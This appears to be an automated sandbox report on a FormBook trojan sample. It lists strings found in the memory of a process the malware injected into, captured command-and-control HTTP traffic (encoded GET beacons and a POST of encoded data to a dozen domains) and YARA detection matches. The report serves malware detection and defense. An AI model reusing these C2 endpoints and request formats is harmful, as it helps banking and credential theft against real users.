LINKS</p> equals www.facebook.com (Facebook)
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: </div><div class="fusion-social-links fusion-social-links-1" style="--awb-margin-top:0px;--awb-margin-right:0px;--awb-margin-bottom:0px;--awb-margin-left:0px;--awb-box-border-top:0px;--awb-box-border-right:0px;--awb-box-border-bottom:0px;--awb-box-border-left:0px;--awb-icon-colors-hover:rgba(166,109,63,0.8);--awb-box-colors-hover:rgba(242,243,245,0.8);--awb-box-border-color:var(--awb-color3);--awb-box-border-color-hover:var(--awb-color4);"><div class="fusion-social-networks boxed-icons color-type-brand"><div class="fusion-social-networks-wrapper"><a class="fusion-social-network-icon fusion-tooltip fusion-facebook awb-icon-facebook" style="color:#ffffff;font-size:16px;width:16px;background-color:#3b5998;border-color:#3b5998;border-radius:4px;" data-placement="top" data-title="Facebook" data-toggle="tooltip" title="Facebook" aria-label="facebook" target="_blank" rel="noopener noreferrer" href="https://www.facebook.com/staciesellsLKA"></a><a class="fusion-social-network-icon fusion-tooltip fusion-instagram awb-icon-instagram" style="color:#ffffff;font-size:16px;width:16px;background-color:#3f729b;border-color:#3f729b;border-radius:4px;" data-placement="top" data-title="Instagram" data-toggle="tooltip" title="Instagram" aria-label="instagram" target="_blank" rel="noopener noreferrer" href="https://www.instagram.com/realestatewithstacie/"></a><a class="fusion-social-network-icon fusion-tooltip fusion-linkedin awb-icon-linkedin" style="color:#ffffff;font-size:16px;width:16px;background-color:#0077b5;border-color:#0077b5;border-radius:4px;" data-placement="top" data-title="LinkedIn" data-toggle="tooltip" title="LinkedIn" aria-label="linkedin" target="_blank" rel="noopener noreferrer" href="https://www.linkedin.com/in/stacie-chandler-03068570/"></a></div></div></div></div></div><div class="fusion-layout-column fusion_builder_column fusion-builder-column-2 fusion-flex-column" style="--awb-bg-size:cover;--awb-width-large:15%;--awb-margin-top-large:0px;--awb-spacing-right-large:15.833333333333%;--awb-margin-bottom-large:60px;--awb-spacing-left-large:15.833333333333%;--awb-width-medium:15%;--awb-order-medium:0;--awb-spacing-right-medium:15.833333333333%;--awb-spacing-left-medium:15.833333333333%;--awb-width-small:50%;--awb-order-small:0;--awb-spacing-right-small:4.75%;--awb-spacing-left-small:4.75%;"><div class="fusion-column-wrapper fusion-column-has-shadow fusion-flex-justify-content-flex-start fusion-content-layout-column"><div class="fusion-text fusion-text-3" style="--awb-content-alignment:left;--awb-font-size:18px;--awb-text-color:var(--awb-color1);"><p>QUICK LINKS</p> equals www.linkedin.com (Linkedin)
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://ogp.me/ns#
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://ogp.me/ns/fb#
        Source: rundll32.exe, 00000008.00000002.831753356.0000000004AE6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://survey-smiles.com
        Source: explorer.exe, 00000003.00000000.539329346.0000000008260000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-content/plugins/wp-google-places-review-slider/public/css/wprev-pub
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-content/plugins/wp-google-places-review-slider/public/js/wprev-publ
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-content/plugins/wp-zillow-review-slider/public/css/wprev-public_tem
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-content/plugins/wp-zillow-review-slider/public/css/wprs_unslider-do
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-content/plugins/wp-zillow-review-slider/public/css/wprs_unslider.cs
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-content/plugins/wp-zillow-review-slider/public/css/wpzillow_w3.css?
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-content/plugins/wp-zillow-review-slider/public/js/wprev-public.js?v
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-content/plugins/wp-zillow-review-slider/public/js/wprs-unslider-min
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-content/themes/Avada-Child-Theme/style.css?ver=6.1.1
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-content/themes/Avada/includes/lib/assets/fonts/icomoon/awb-icons.wo
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-content/uploads/2023/01/sc-logo-350.fw_.png
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-content/uploads/2023/01/sc-logo-700.fw_.png
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-content/uploads/2023/02/logo-180.jpg
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-content/uploads/2023/02/logo-192.jpg
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-content/uploads/2023/02/logo-250.fw_.png
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-content/uploads/2023/02/logo-270.jpg
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-content/uploads/2023/02/logo-500.fw_.png
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-content/uploads/2023/02/logo-64.jpg
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-content/uploads/fusion-scripts/cfbe0fd0551026bb9e720017defa5c86.min
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-content/uploads/fusion-styles/c31c9462cccd628e3a0d26c81b9be7b5.min.
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-includes/css/classic-themes.min.css?ver=1
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-includes/css/dist/block-library/style.min.css?ver=6.1.1
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.1
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-includes/wlwmanifest.xml
        Source: j-E8-1M.8.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://api.w.org/
        Source: j-E8-1M.8.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: rundll32.exe, 00000008.00000002.831753356.000000000512E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js
        Source: rundll32.exe, 00000008.00000002.831753356.000000000512E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
        Source: rundll32.exe, 00000008.00000002.831753356.000000000512E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css
        Source: j-E8-1M.8.drString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: j-E8-1M.8.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: j-E8-1M.8.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Exo
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://kestrel.idxhome.com/ihf-kestrel.js?ver=6.1.1
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/css/parking2.css
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-desplegar.jpg
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-facebook-small.png
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-hosting.png
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-parking.png
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-ssl-parking.png
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-twitter-small.png
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-web-sencilla.png
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-web.png
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://plus.google.com/u/0/102310483732773374239
        Source: j-E8-1M.8.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
        Source: rundll32.exe, 00000008.00000002.832505991.0000000006F50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/search
        Source: rundll32.exe, 00000008.00000002.832505991.0000000006F50000.00000004.00000020.00020000.00000000.sdmp, j-E8-1M.8.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
        Source: j-E8-1M.8.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
        Source: j-E8-1M.8.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
        Source: rundll32.exe, 00000008.00000002.832505991.0000000006F50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=main
        Source: rundll32.exe, 00000008.00000002.832505991.0000000006F50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=main_sfpf
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://shop.piensasolutions.com/search-ajax.php?utm_source=parking&amp;utm_medium=link&amp;utm_camp
        Source: rundll32.exe, 00000008.00000002.831753356.0000000004F9C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://tilda.cc
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://twitter.com/piensasolutions
        Source: rundll32.exe, 00000008.00000002.831753356.0000000005908000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.cmproutdoors.com/dhxt/?UlkAHnsI=Hdg1eSHwHIdp18MOehnfDNNUuCDltrvSJkToDZ2NoA5/soeDYsGvmU4g
        Source: rundll32.exe, 00000008.00000002.831753356.0000000005776000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 00000008.00000002.832455626.0000000006CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: rundll32.exe, 00000008.00000002.832505991.0000000006F50000.00000004.00000020.00020000.00000000.sdmp, j-E8-1M.8.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.netqwik.com
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/certificado-ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campa
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/crear-web?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=we
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/dominios?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dom
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/hosting?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=host
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=correo
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/web-sencilla?utm_source=parking&amp;utm_medium=link&amp;utm_campaign
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=piensa
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.realestatewithstacie.com/
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/about/
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/blog/
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/comments/feed/
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/contact-me/
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/feed/
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/homes-for-sale-search/
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/lake-anna/
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/mortgage-calculator/
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/open-home-search/
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/properties/
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/wp-admin/admin-ajax.php
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/wp-content/uploads/2023/01/white-logo-300.fw_.fw_-200x71.png
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/wp-content/uploads/2023/01/white-logo-300.fw_.fw_.png
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/wp-content/uploads/2023/02/realtor-logo.fw_.png
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/wp-content/uploads/fusion-gfonts/KFOmCnqEu92Fr1Mu4mxK.woff2
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/wp-content/uploads/fusion-gfonts/dg4n_p3sv6gCJkwzT6RXiJwo.woff2
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/wp-content/uploads/fusion-gfonts/o-0IIpQlx3QUlC5A4PNr5TRA.woff2
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/wp-content/uploads/fusion-icons/mechanic-icon-set/fonts/mechanic.ttf?
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/wp-content/uploads/fusion-icons/psychology-v1.1/fonts/psychology.ttf?
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/wp-json/
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/xmlrpc.php?rsd
        Source: unknownHTTP traffic detected: POST /dhxt/ HTTP/1.1Host: www.b-yy.xyzConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.b-yy.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.b-yy.xyz/dhxt/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 6c 6b 41 48 6e 73 49 3d 76 73 58 6e 28 6d 71 75 28 4b 67 77 68 2d 39 47 63 2d 4f 66 32 44 4f 7a 75 6e 69 66 4b 4c 28 36 77 72 56 4e 59 71 65 43 63 44 6a 57 68 62 77 32 59 34 34 7a 47 36 63 41 67 7a 70 65 79 47 4e 47 67 58 5a 6f 78 66 67 32 34 53 64 70 68 4a 62 48 65 5a 38 34 53 4b 4e 74 63 36 69 6d 59 45 34 35 75 39 49 4a 7a 78 5a 4d 55 36 68 75 75 70 6f 48 4a 6f 68 59 75 66 4b 77 72 63 48 65 50 6b 64 6c 4c 4b 67 33 50 66 72 56 54 47 39 39 4b 77 78 76 36 34 5a 43 43 6a 36 56 4c 53 74 75 32 50 34 31 33 43 61 6b 68 37 57 69 77 43 38 6e 4f 57 6d 5f 4b 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: UlkAHnsI=vsXn(mqu(Kgwh-9Gc-Of2DOzunifKL(6wrVNYqeCcDjWhbw2Y44zG6cAgzpeyGNGgXZoxfg24SdphJbHeZ84SKNtc6imYE45u9IJzxZMU6huupoHJohYufKwrcHePkdlLKg3PfrVTG99Kwxv64ZCCj6VLStu2P413Cakh7WiwC8nOWm_Kw).
        Source: unknownDNS traffic detected: queries for: www.utmedicined.com
        Source: global trafficHTTP traffic detected: GET /dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=GMJpuu0CUPuENYia2wBq5vF0+NhzyO/+t2WdNBBbZP32/2p6mtsWQVykz4YrZzp7DrUWVvB/4Ftn1F9mFxE3fjZXBYQ8lylMnw== HTTP/1.1Host: www.utmedicined.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /dhxt/?UlkAHnsI=iu/H8WHS+bo1nMJvRdq/iC6svF2/HYXNnbtNRbi1LgexvtsRTtlIctNP2ExBqlFb1kQrkeEU0URUxcClbqwbX/pXEbDFcWstrA==&2ani-=qhGAdkIKoH HTTP/1.1Host: www.b-yy.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=8voFCfVULodAC65O8zxk+Vq77CzX57WY/dJ15bldeZcww2bgGpUJFoE2xkKZjlmzbDc1YNM8KHZO1I2ZrlZ1XIcvUu8N2Hwmug== HTTP/1.1Host: www.fildoor.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /dhxt/?UlkAHnsI=GgGZ8XnpwcXWt0AEsp/4OdJSGPmAlrgxEwmnAr+KMWurQo94+Qn94Sj3VSd8nLdkKuBNUoOidT9aHFNGgyN51vgfDTNlsm7YLA==&2ani-=qhGAdkIKoH HTTP/1.1Host: www.parkhomenko-zinaida.ruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=wbPnfyQfXR4PZAPT09H9uXzHHhq4HhWkGwCNvg5IVQDwAqkAqM9rZA7nMC+fOtAInmSNsI36IN462a2w51jaKCiXRWhZTFR9pQ== HTTP/1.1Host: www.dezella.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /dhxt/?UlkAHnsI=ifokxT4WC6kpOYMw3zM3kyJ4LmgGiGZS0703YorY1YsjQRfHkIwKIIkPfqFmPEtQEdhteK5+EAiLfL0gYcUW2DoEXWveCWJMNw==&2ani-=qhGAdkIKoH HTTP/1.1Host: www.staciesellslka.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=fnx//ZKuIyFV+ywUcXCMreymOGqG1X949mc4/IKLw0PV+ItzLTg5d1T/xYzfA/mrlDLEGtysh8NCeOJ7jTcJkgo8rK5p5nSJ6g== HTTP/1.1Host: www.gmbuxie.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /dhxt/?UlkAHnsI=Y88RZnbUg+vg39XJ7Xe2z5ar6Steri0PsoUs6lQE0S1yE6fkUvOaIgRIh7ssJiEciN8m5Ru/FUUSgB9hFV8vRHrdywJO04cRIQ==&2ani-=qhGAdkIKoH HTTP/1.1Host: www.lastmilerent.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=stngXlFCM6RnlHv9W0Owvb5Q7a/1GW7Bx3QsCD4j5Kk1nwRSFSS2AVlFvVf479jy1oAGro1MyvipTvqZ1lHNwKEX6xCFHE1kEA== HTTP/1.1Host: www.moneycarrewards.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /dhxt/?UlkAHnsI=Hdg1eSHwHIdp18MOehnfDNNUuCDltrvSJkToDZ2NoA5/soeDYsGvmU4g1NuJE+12L7lxU5+TL8fcs8OKnDw+uls6plsXJT+jSQ==&2ani-=qhGAdkIKoH HTTP/1.1Host: www.cmproutdoors.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=FfOdtLZjvYP8bXm/clPh5g/7x4+RQqyIHbKOkwKrIc0A7AIax+WKqABy5xS4eERJuSBeHh7W6Lqe0kjzR+0vnl8saQ3UdmHxRw== HTTP/1.1Host: www.ontheverge.walesConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /dhxt/?UlkAHnsI=FUiWQqlvvhcOKQQuFFk1YdMODVpPUkI9QkHdYK1vvGDvQckHnduU+ib0kpFdu5Ayi+Be8xCaUG88sYAzbmt0txmA9iBLGYJGLw==&2ani-=qhGAdkIKoH HTTP/1.1Host: www.0w3jy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=u+zktjrvfgHZI+Oz0oPk7S6z3SS4eQzlxj31ise38TMlPN2sQxJreAld73CkW67638HFSoqfGq7wTiBJHuDRXWnGAUEuFgsZZw== HTTP/1.1Host: www.frogair.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

        E-Banking Fraud

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 0.2.zeuhAxTIRX.exe.e50000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000000.00000002.576146371.0000000000810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.830673789.00000000041A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.830024885.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.576236738.0000000000840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 0.2.zeuhAxTIRX.exe.e50000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0.2.zeuhAxTIRX.exe.e50000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000000.00000002.576146371.0000000000810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000000.00000002.576146371.0000000000810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000008.00000002.830673789.00000000041A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000008.00000002.830673789.00000000041A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
